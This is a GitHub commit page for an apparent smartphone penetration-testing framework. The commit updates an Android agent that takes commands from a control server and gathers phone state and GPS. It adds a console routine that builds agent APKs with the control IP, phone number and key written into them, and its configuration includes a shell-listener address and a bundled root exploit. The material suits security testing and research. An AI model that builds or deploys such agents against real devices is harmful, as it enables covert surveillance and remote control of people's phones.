Permalink
Browse files

0.1.4

  • Loading branch information...
1 parent fa8df5c commit eb9567ed48b7d958169ce09080a385907fc76e24 @georgiaw committed Nov 25, 2012
View
3 AndroidAgent/AndroidManifest.xml
@@ -15,6 +15,7 @@
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
+ <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<application
@@ -59,6 +60,8 @@
</service>
<service android:name="GetGPS">
</service>
+ <service android:name="Checkin">
+ </service>
<service android:name="Phase1" android:process=":three">
</service>
<service android:name="Phase2" android:process=":two">
View
BIN AndroidAgent/bin/AndroidAgent.apk
Binary file not shown.
View
3 AndroidAgent/bin/AndroidManifest.xml
@@ -15,6 +15,7 @@
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
+ <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<application
@@ -59,6 +60,8 @@
</service>
<service android:name="GetGPS">
</service>
+ <service android:name="Checkin">
+ </service>
<service android:name="Phase1" android:process=":three">
</service>
<service android:name="Phase2" android:process=":two">
View
BIN AndroidAgent/bin/classes.dex
Binary file not shown.
View
BIN AndroidAgent/bin/classes/com/bulbsecurity/framework/AndroidAgent.class
Binary file not shown.
View
BIN AndroidAgent/bin/classes/com/bulbsecurity/framework/CommandHandler.class
Binary file not shown.
View
BIN AndroidAgent/bin/classes/com/bulbsecurity/framework/Phase1.class
Binary file not shown.
View
BIN AndroidAgent/bin/classes/com/bulbsecurity/framework/R$raw.class
Binary file not shown.
View
BIN AndroidAgent/bin/classes/com/bulbsecurity/framework/R$string.class
Binary file not shown.
View
BIN AndroidAgent/bin/resources.ap_
Binary file not shown.
View
3 AndroidAgent/gen/com/bulbsecurity/framework/R.java
@@ -21,7 +21,8 @@
public static final int main=0x7f030001;
}
public static final class raw {
- public static final int rageagainstthecage=0x7f040000;
+ public static final int config=0x7f040000;
+ public static final int rageagainstthecage=0x7f040001;
}
public static final class string {
public static final int app_name=0x7f050001;
View
2 AndroidAgent/src/com/bulbsecurity/framework/AndroidAgent.java
@@ -3,7 +3,7 @@
import android.app.Application;
public class AndroidAgent extends Application {
- private String controlIP = "192.168.20.37";
+ private String controlIP = "192.168.7.177";
private String URL = "/control";
private String key = "KEYKEY1";
private String path = "/androidagent1";
View
11 AndroidAgent/src/com/bulbsecurity/framework/CommandHandler.java
@@ -26,6 +26,7 @@ public void onStart(Intent intent, int startID) {
String pict = "PICT";
String root = "ROOT";
String gps = "GGPS";
+ String attach = "ATTA";
String body = intent.getStringExtra("message");
if (body.length() >= 12)
@@ -55,6 +56,16 @@ public void onStart(Intent intent, int startID) {
}
+
+ else if (checkfunction.equals(attach)) {
+
+ Intent intent4 = new Intent(getApplicationContext(), Checkin.class);
+ Context context3 = getApplicationContext();
+ context3.startService(intent4);
+
+
+ }
+
else if (checkfunction.equals(smss)) {
String aString[] = body.split(" ");
if (aString.length >= 3)
View
4 AndroidAgent/src/com/bulbsecurity/framework/GetGPS.java
@@ -37,8 +37,8 @@ public void onStart(Intent intent, int startID) {
try
{
- lat = location.getLatitude ();
- lon = location.getLongitude ();
+ lat = location.getLatitude();
+ lon = location.getLongitude();
}
catch (NullPointerException e)
{
View
BIN FrameworkAndroidApp/bin/FrameworkAndroidApp.apk
Binary file not shown.
View
BIN FrameworkAndroidApp/bin/resources.ap_
Binary file not shown.
View
0 FrameworkAndroidApp/gen/com/bulbsecurity/framework/app/R.java 100755 → 100644
File mode changed.
View
6 btinstall
@@ -22,7 +22,11 @@ sleep 5;
git clone https://github.com/georgiaw/Smartphone-Pentest-Framework.git;
echo -e "$(tput setaf 1)\nCloning has completed. Continuing Setup \n"; echo "$(tput sgr0)"
-
+wget http://dl.google.com/android/android-sdk_r21-linux.tgz;
+tar -xvzf android-sdk_r21-linux.tgz;
+export PATH=${PATH}:/root/Smartphone-Pentest-Framework/android-sdk-linux/tools:/root/Smartphone-Pentest-Framework/android-sdk-linux/platform-tools
+apt-get install ant1.8
+android update sdk --no-ui --filter android-4
echo -e "$(tput setaf 1)Creating first time 'framework' database (empty)\n"; echo "$(tput sgr0)"
service mysql start;
View
BIN frameworkconsole/AndroidAgent.apk
Binary file not shown.
View
6 frameworkconsole/config
@@ -2,9 +2,9 @@
#ROOT DIRECTORY FOR THE WEBSERVER THAT WILL HOST OUR FILES
WEBSERVER = /var/www
#IPADDRESS FOR WEBSERVER (webserver needs to be listening on this address)
-IPADDRESS = 10.215.166.211
+IPADDRESS = 10.0.1.10
#IP ADDRESS TO LISTEN ON FOR SHELLS
-SHELLIPADDRESS = 10.215.166.211
+SHELLIPADDRESS = 10.0.1.10
#IP ADDRESS OF SQLSERVER 127.0.0.1 IF LOCALHOST
MYSQLSERVER = 127.0.0.1
#DATABASE TYPE (mysql or postgres)
@@ -19,3 +19,5 @@ MYSQLPORT = 3306
ANDROIDAGENT = /root/Smartphone-Pentest-Framework/frameworkconsole/AndroidAgent.apk
#LOCATION OF IPHONE DEB FOR AGENT DROP
IPHONEAGENT = /root/Smartphone-Pentest-Framework/frameworkconsole/iphone.deb
+#LOCATION OF ANDROID AGENT SRC
+ANDROIDAGENTSRC = /root/Smartphone-Pentest-Framework/AndroidAgent
View
109 frameworkconsole/framework.pl
@@ -4,7 +4,7 @@
use Expect;
use IO::Socket;
use Device::SerialPort;
-$version = "0.1.2";
+$version = "0.1.3";
$configfile = "config";
open(CONFIG, "+<$configfile");
while (<CONFIG>)
@@ -27,7 +27,7 @@
print "\n\n";
while (1){
print "Select An Option from the Menu:\n\n";
- print "\t1.) Attach Framework to a Deployed Agent\n";
+ print "\t1.) Attach Framework to a Deployed Agent/Create Agent\n";
print "\t2.) Send Commands to an Agent\n";
print "\t3.) View Information Gathered\n";
print "\t4.) Attach Framework to a Mobile Modem\n";
@@ -40,7 +40,7 @@
$choice = <>;
if ($choice == 1)
{
- agent_attach();
+ agent_attach2();
}
if ($choice == 2)
{
@@ -72,6 +72,82 @@
}
}
+sub agent_attach2()
+{
+ while (1){
+ print "Select An Option from the Menu:\n\n";
+ print "\t1.) Attach Framework to a Deployed Agent\n";
+ print "\t2.) Generate Agent App\n";
+ print "spf>";
+ $choice2 = <>;
+ if ($choice2 == 1)
+ {
+ agent_attach();
+ last;
+ }
+ if ($choice2 == 2)
+ {
+ make_agent();
+ last;
+ }
+
+ }
+
+}
+
+sub make_agent()
+{
+ while(1)
+ {
+ $agentsrc = $Variables{"ANDROIDAGENTSRC"};
+ $ipaddress = $Variables{"IPADDRESS"};
+ $androidagentlocation = $Variables{"ANDROIDAGENT"};
+ $codepath = $agentsrc . "/src/com/bulbsecurity/framework/";
+ $agentfile = $codepath . "AndroidAgent.java";
+ $receiverfile = $codepath . "SMSReceiver.java";
+ print "This module compiles an Android Agent for use with SPF.\n";
+ print "Phone number of the control modem for the agent:";
+ $controlphone = <>;
+ chomp($controlphone);
+ print "Control key for the agent:";
+ $controlkey = <>;
+ chomp($controlkey);
+ print "Webserver control path for agent:";
+ $controlpath = <>;
+ chomp($controlpath);
+ print "\n\nControl Number:" . $controlphone . "\nControl Key:" . $controlkey . "\nControl Path:" . $controlpath . "\nIs this correct?(y/n)";
+ $correct = <>;
+ chomp($correct);
+ if (lc($correct) eq "y")
+ {
+ $command = "sed -i \'s/controlIP =.*/controlIP = \"" . $ipaddress . "\";/' " . $agentfile;
+ system($command);
+ $command = "sed -i \'s/controlNumber =.*/controlNumber = \"" . $controlphone . "\";/' " . $agentfile;
+ system($command);
+ $command = "sed -i \'s/controlnumber =.*/controlnumber = \"" . $controlphone . "\";/' " . $receiverfile;
+ system($command);
+ $command = "sed -i \'s/key =.*/key = \"" . $controlkey . "\";/' " . $agentfile;
+ system($command);
+ $command = "sed -i \'s/key =.*/key = \"" . $controlkey . "\";/' " . $receiverfile;
+ system($command);
+ $command = "sed -i \'s/path =.*/path = \"\\" . $controlpath . "\";/' " . $agentfile;
+ system($command);
+ $command = "android update project --path " . $agentsrc . " --target android-4";
+ system($command);
+ $command = "ant -f " . $agentsrc . "/build.xml debug";
+ system($command);
+ $command = "cp " . $agentsrc . "/bin/AndroidAgentActivity-debug-unaligned.apk " . $androidagentlocation;
+ system($command);
+ last;
+ }
+
+ }
+
+
+
+}
+
+
sub database_clear()
{
print "This will destroy all your data. Are you sure you want to? (y/N)?";
@@ -1773,30 +1849,37 @@ sub agent_attach
print "Attach to a Deployed Agent:\n\n";
while (1)
{
- print "This will set up handlers to control an agent that has already been deployed. You will need to fill in the correct configuration information for the agent including the control phone number,control key, and URL path. Leave an entry blank if that functionality is not present.\n\n";
- print "Agent Phone Number:";
- $phonenumber = <>;
- print "Control Phone Number:";
- $phonenumber2 = <>;
+ print "This will set up handlers to control an agent that has already been deployed.\n\n";
print "Agent URL Path:";
$path = <>;
print "Agent Control Key:";
$key = <>;
- print "Agent Platform (Android/Blackberry/iPhone):";
- $platform = <>;
- print "\n\nAgent Phone Number: " . $phonenumber . "Control Phone Number: " . $phonenumber2 . "URL Path: " . $path . "Control Key: ". $key . "Platform: " . $platform . "Is this correct?(y/N):";
+ print "\n\nURL Path: " . $path . "Control Key: ". $key . "Is this correct?(y/N):";
$correct = <>;
chomp($correct);
chomp($path);
chomp($key);
- chomp($phonenumber2);
- chomp($phonenumber);
+ #chomp($phonenumber2);
+ #chomp($phonenumber);
if (lc($correct) eq "y")
{
if ($path ne "")
{
make_files($path);
}
+ $command = $key . " ATTA";
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">$control");
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "+<$text");
+ $line= <TEXTFILE>;
+ @lines = split(/,/, $line);
+ $phonenumber = @lines[1];
+ $platform = @lines[2];
+ $phonenumber2 = @lines[3];
database_add($phonenumber,$path,$key,$phonenumber2,$platform);
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
View
4 frameworkgui/config
@@ -2,9 +2,9 @@
#ROOT DIRECTORY FOR THE WEBSERVER THAT WILL HOST OUR FILES
WEBSERVER = /var/www
#IPADDRESS FOR WEBSERVER (webserver needs to be listening on this address)
-IPADDRESS = 192.168.1.12
+IPADDRESS = 192.168.7.177
#IP ADDRESS TO LISTEN ON FOR SHELLS
-SHELLIPADDRESS = 192.168.1.12
+SHELLIPADDRESS = 192.168.7.177
#IP ADDRESS OF SQLSERVER 127.0.0.1 IF LOCALHOST
MYSQLSERVER = 127.0.0.1
#DATABASE TYPE (Mysql of Postgresql)

0 comments on commit eb9567e

Please sign in to comment.